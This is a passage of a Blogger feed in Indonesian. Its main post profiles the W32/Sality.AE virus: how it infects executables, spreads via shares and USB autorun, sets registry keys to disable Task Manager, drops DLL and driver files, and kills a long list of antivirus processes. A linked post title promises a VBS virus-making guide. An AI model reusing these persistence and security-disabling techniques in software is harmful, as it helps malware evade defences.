href='http://rinaldojonathan.blogspot.com/2009/10/cara-mudah-membuat-virus-format-vbs.html' title='Cara Mudah Membuat Virus Format *.VBS'/><author><name>Rinaldo Jonathan</name><uri>http://www.blogger.com/profile/05218924290554068114</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8177802711873346685.post-7855031634254891440</id><published>2009-10-29T07:13:00.000-07:00</published><updated>2009-10-29T07:19:34.329-07:00</updated><title type='text'>W32/Sality.AE</title><content type='html'>&lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;Kalau Conficker dapat dikatakan sebagai worm nomor satu di Indonesia, maka predikat virus yang paling merepotkan dan paling banyak ditemui Vaksincom di Indonesia pantas di sandang oleh Sality. Virus yang disinyalir  berasal dari Taiwan / Cina ini secara meyakinkan menempati ranking pertama dalam  infeksi virus yang diterima oleh Vaksincom bersama-sama dengan Conficker.&lt;/span&gt;&lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;Memang menyebalkan jika semua program kita ikut dimakan oleh virus [di infeksi], disamping sulit dalam memberantas virusnya terkadang juga file yang sudah di injeksi tersebut tidak dapat digunakan alias rusak setelah di scan dan dibersihkan oleh antivirus, alhasil harus reinstall semua program yang error atau download ulang file yang sudah di injenksi tersebut.&lt;/span&gt;&lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;/p&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;Salah satu virus yang akan menginjeksi file exe/com/scr ini adalah W32/Sality.AE.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;Ukuran file yang sudah terinfeksi W32/Sality.AE akan bertambah besar beberapa KB dan file yang sudah terinfeksi W32/Sality.AE ini masih dapat di jalankan seperti biasa. Biasanya virus ini akan mencoba untuk blok program antivirus atau removal tools saat dijalankan serta mencoba untuk blok task manager atau “registry editor” Windows. Untuk mempermudah dalam proses penyebarannya selain memanfaatkan “File Sharing” dan “Default Share” virus ini juga akan memanfaatkan media Flash Disk dengan cara membuat file acak yang mempunyai ekstensi exe/com/scr/pif serta menambahkan file autorun.inf yang memungkinkan virus dapat aktif secara otomatis setiap kali user mengakses Flash Disk.&lt;/span&gt;&lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;Untuk blok task manager atau Registry tools, W32/Sality.AE ini akan membuat string pada registry berikut:&lt;/span&gt;&lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\system&lt;/span&gt;&lt;/p&gt; &lt;ul&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;DisableRegistryTools&lt;/span&gt;&lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;DisableTaskMgr&lt;/span&gt;&lt;/p&gt; &lt;/li&gt;&lt;/ul&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;Pada saat file yang terinfeksi W32/Sality.AE, ia akan mendekrip dirinya dan mencoba untuk kopi beberapa file *.dll (acak) file DLL kemudian akan menginjeksi file lain yang aktif di memori serta file lain yang terdapat di komputer dan jaringan (file sharing) serta  menginfeksi file *.exe yang terdapat dalam list registry berikut sehingga memungkinkan virus dapat aktif secara otomatis setiap kali komputer dinyalakan.&lt;/span&gt;&lt;/p&gt; &lt;ul&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;em&gt;&lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;&lt;span style="font-style: normal;"&gt;HKLM\Software\Microsoft\Windows\CurrentVersion\Run&lt;/span&gt;&lt;/span&gt;&lt;/em&gt;&lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;em&gt;&lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;&lt;span style="font-style: normal;"&gt;HKCU\Software\Microsoft\Windows\CurrentVersion\Run&lt;/span&gt;&lt;/span&gt;&lt;/em&gt;&lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;HKEY_CURRENT_USER\Software\Microsoft\Windows\ShellNoRoam\MUICache&lt;/span&gt;&lt;/p&gt; &lt;/li&gt;&lt;/ul&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;Berikut beberapa contoh file *.dll yang akan di drop oleh W32/Sality.AE.&lt;/span&gt;&lt;/p&gt;&lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;/p&gt;&lt;ul&gt;&lt;li&gt;  &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0in;" lang="en-US"&gt;  &lt;em&gt;&lt;span style="font-family:Arial, sans-serif;font-size:85%;color:#000000;"&gt;&lt;span style="font-style: normal;"&gt;C:\Windows\system32\syslib32.dll&lt;/span&gt;&lt;/span&gt;&lt;/em&gt;&lt;span style="font-family:Arial, sans-serif;font-size:85%;color:#000000;"&gt;&lt;i&gt;  &lt;/i&gt;&lt;/span&gt;  &lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" lang="en-US"&gt;&lt;em&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;color:#000000;"&gt;&lt;span style="font-style: normal;"&gt;C:\Windows\system32\oledsp32.dll&lt;/span&gt;&lt;/span&gt;&lt;/em&gt;&lt;span style="font-family:Arial, sans-serif;font-size:85%;color:#000000;"&gt;&lt;i&gt;  &lt;/i&gt;&lt;/span&gt;  &lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" lang="en-US"&gt;&lt;em&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;color:#000000;"&gt;&lt;span style="font-style: normal;"&gt;C:\Windows\system32\olemdb32.dll&lt;/span&gt;&lt;/span&gt;&lt;/em&gt;&lt;span style="font-family:Arial, sans-serif;font-size:85%;color:#000000;"&gt;&lt;i&gt;  &lt;/i&gt;&lt;/span&gt;  &lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" lang="en-US"&gt;&lt;em&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;color:#000000;"&gt;&lt;span style="font-style: normal;"&gt;C:\Windows\system32\wcimgr32.dll&lt;/span&gt;&lt;/span&gt;&lt;/em&gt;&lt;span style="font-family:Arial, sans-serif;font-size:85%;color:#000000;"&gt;&lt;i&gt;  &lt;/i&gt;&lt;/span&gt;  &lt;/p&gt;  &lt;/li&gt;&lt;li&gt;  &lt;p class="western" style="margin-bottom: 0pt; margin-top: 0pt;" lang="en-US"&gt;&lt;em&gt;  &lt;span style="font-family:Arial, sans-serif;font-size:85%;color:#000000;"&gt;&lt;span style="font-style: normal;"&gt;C:\Windows\system32\wmimgr32.dll&lt;/span&gt;&lt;/span&gt;&lt;/em&gt;&lt;/p&gt; &lt;/li&gt;&lt;/ul&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;Selain membuat file DLL, sality juga akan membuat file *.sys [acak] di direktori “C:\Windows\system32\drivers” [contoh: kmionn.sys]&lt;/span&gt;&lt;/p&gt;   &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" lang="en-US"&gt;    &lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;&lt;b&gt;Blok Antivirus dan software security&lt;/b&gt;&lt;/span&gt;&lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt; &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;Seperti yang sudah dijelaskan di atas bahwa untuk mempermudah proses penyebaran ia juga akan mencoba untuk mematikan proses yang berhubungan dengan program security khususnya antivirus dengan cara mematikan proses yang mempunyai nama dibawah ini: &lt;/span&gt; &lt;/p&gt; &lt;p class="western" style="margin-bottom: 0in; margin-top: 0pt;" align="justify" lang="en-US"&gt;  &lt;/p&gt; &lt;table border="1" border cellpadding="4" cellspacing="0" width="100%" style="color:#000000;"&gt;  &lt;col&gt;  &lt;col width="128*"&gt;  &lt;tbody&gt;&lt;tr valign="top"&gt;   &lt;td style="width: 46%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;ALG    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 41%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;InoRPC    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr valign="top"&gt;   &lt;td style="width: 46%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;aswUpdSv    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 41%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;InoRT    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr valign="top"&gt;   &lt;td style="width: 46%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;avast!    Antivirus &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 41%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;InoTask    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr valign="top"&gt;   &lt;td style="width: 46%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;avast!    Mail Scanner &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 41%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;ISSVC    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr valign="top"&gt;   &lt;td style="width: 46%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;avast!    Web Scanner &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 41%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;KPF4    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr valign="top"&gt;   &lt;td style="width: 46%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;AVP&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 41%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;LavasoftFirewall    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr valign="top"&gt;   &lt;td style="width: 46%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;BackWeb    Plug-in - 4476822 &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 41%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;LIVESRV    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr valign="top"&gt;   &lt;td style="width: 46%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;bdss    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 41%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;McAfeeFramework    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr valign="top"&gt;   &lt;td style="width: 46%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;BGLiveSvc    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 41%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;McShield    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr valign="top"&gt;   &lt;td style="width: 46%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;BlackICE    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 41%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;McTaskManager    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr valign="top"&gt;   &lt;td style="width: 46%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;CAISafe    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 41%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;navapsvc    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr valign="top"&gt;   &lt;td style="width: 46%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;ccEvtMgr    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 41%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;NOD32krn    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr valign="top"&gt;   &lt;td style="width: 46%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;ccProxy    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 41%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;NPFMntor    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr valign="top"&gt;   &lt;td style="width: 46%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;ccSetMgr    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 41%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;NSCService    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr valign="top"&gt;   &lt;td style="width: 46%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;F-Prot    Antivirus Update Monitor &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 41%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;Outpost    Firewall main module &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr valign="top"&gt;   &lt;td style="width: 46%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;fsbwsys    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 41%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;OutpostFirewall    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr valign="top"&gt;   &lt;td style="width: 46%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;FSDFWD    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 41%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;PAVFIRES    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr valign="top"&gt;   &lt;td style="width: 46%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;F-Secure    Gatekeeper Handler Starter &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 41%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;PAVFNSVR    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr valign="top"&gt;   &lt;td style="width: 46%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;fshttps    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 41%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;PavProt    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr valign="top"&gt;   &lt;td style="width: 46%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;FSMA    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 41%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;PavPrSrv    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr valign="top"&gt;   &lt;td style="width: 46%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;PAVSRV    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 41%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;Symantec    Core LC &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr valign="top"&gt;   &lt;td style="width: 46%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;PcCtlCom    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 41%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;Tmntsrv    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr valign="top"&gt;   &lt;td style="width: 46%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;PersonalFirewal    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 41%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;TmPfw    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr valign="top"&gt;   &lt;td style="width: 46%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;PREVSRV    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 41%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;tmproxy    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr valign="top"&gt;   &lt;td style="width: 46%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;ProtoPort    Firewall service &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 41%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;UmxAgent    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr valign="top"&gt;   &lt;td style="width: 46%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;PSIMSVC    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 41%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;UmxCfg    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr valign="top"&gt;   &lt;td style="width: 46%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;RapApp    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 41%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;UmxLU    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr valign="top"&gt;   &lt;td style="width: 46%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;SmcService    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 41%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;UmxPol    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr valign="top"&gt;   &lt;td style="width: 46%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;SNDSrvc    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 41%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;vsmon    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr valign="top"&gt;   &lt;td style="width: 46%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;SPBBCSvc    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 41%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;VSSERV    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr valign="top"&gt;   &lt;td style="width: 46%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;WebrootDesktopFirewallDataService&lt;/span&gt;&lt;/p&gt;   &lt;/td&gt;   &lt;td style="width: 41%;"&gt;    &lt;p class="western" style="margin-top: 0pt; margin-bottom: 0pt;" align="justify" lang="en-US"&gt;    &lt;span style="font-family:Arial, sans-serif;font-size:85%;"&gt;WebrootFirewall    &lt;/span&gt;    &lt;/p&gt;   &lt;/td&gt;  &lt;/tr&gt;  &lt;tr valign="top"&gt;   &lt;td style="width: 46%;"&gt;    &lt;p class="western" 